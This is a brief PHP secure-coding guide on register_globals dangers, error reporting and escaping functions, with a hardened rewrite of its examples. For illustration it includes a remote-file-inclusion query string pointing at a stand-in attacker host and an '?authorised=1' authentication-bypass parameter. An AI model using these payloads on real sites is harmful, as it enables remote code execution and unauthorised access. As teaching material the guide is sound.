PHP Security Leading Practice

Global Variables
One does not need to explicitly create "global variables"; this is done via the php.ini file by turning the "register_globals" directive on. register_globals has been disabled by default since PHP 4.1.0.

Include directives in PHP can be vulnerable if register_globals is enabled.

<?PHP include "$dir/script/dostuff.php"; ?>

With register_globals enabled the $dir variable can be set from the query string:

?dir=http://www.haxor.com/gimmeeverything.php

This would result in the include being evaluated as:

<?PHP include "http://www.haxor.com/gimmeeverything.php"; ?>

Appending global variables to the URL may also be a way to circumvent authentication:

<?PHP if (authenticated_user()) { $authorised = true; } if ($authorised) { give_family_jewels(); } ?>

If this page were requested with register_globals enabled and the parameter ?authorised=1 in the query string, the authentication logic would assume the user is authorised to proceed, because $authorised is never initialised before it is tested. Without register_globals enabled, the variable $authorised would not be affected by the authorised=1 parameter.
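The two snippets above, rewritten so that they do not depend on register_globals being off. This is an added example, not code from the original page; the allowlist $allowed_scripts, the 'action' parameter and the helpers authenticated_user() and give_family_jewels() are assumed placeholders.

```php
<?php
// Added example (not from the original page): hardened versions of the two
// snippets above. Every variable is initialised and request input is read
// explicitly, so a stray ?authorised=1 or ?dir=... has no effect.

// Defensive check: refuse to run if the deprecated directive is still on
// (on PHP versions that removed it, ini_get() returns false and this passes).
if (ini_get('register_globals')) {
    exit('register_globals must be disabled in php.ini');
}
session_start();

// 1. Include: never build a path from request data. Map a short, allowlisted
//    key to a fixed file and verify the resolved path stays in the script dir.
$allowed_scripts = array(           // assumed allowlist of include targets
    'report' => 'report.php',
    'export' => 'export.php',
);
$base_dir = realpath(dirname(__FILE__) . '/script');
$key      = isset($_GET['action']) ? (string) $_GET['action'] : '';

if ($base_dir === false || !array_key_exists($key, $allowed_scripts)) {
    header('HTTP/1.1 400 Bad Request');
    exit('Unknown action');
}
$target = realpath($base_dir . '/' . $allowed_scripts[$key]);
// realpath() returns false for a missing file; the prefix check rejects any
// resolved path that escapes the script directory.
if ($target === false || strpos($target, $base_dir . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Include target outside script directory');
}
include $target;

// 2. Authorisation: set the flag to a safe default before it is tested and
//    derive it only from server-side session state, never from $_GET/$_POST.
$authorised = false;                                   // explicit default
if (!empty($_SESSION['user_id']) && authenticated_user($_SESSION['user_id'])) {
    $authorised = true;                                // assumed helper
}
if ($authorised) {
    give_family_jewels();                              // placeholder from the original snippet
} else {
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}
```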

Error handling
If possible, check whether error reporting has been turned off via php.ini, i.e. whether the "error_reporting" directive is off, so that error messages are not disclosed to users.

Good Things to Use
strip_tags: Removes any HTML from a string
nl2br: Converts new line characters to HTML break "br"
htmlspecialchars: Converts special characters to HTML entities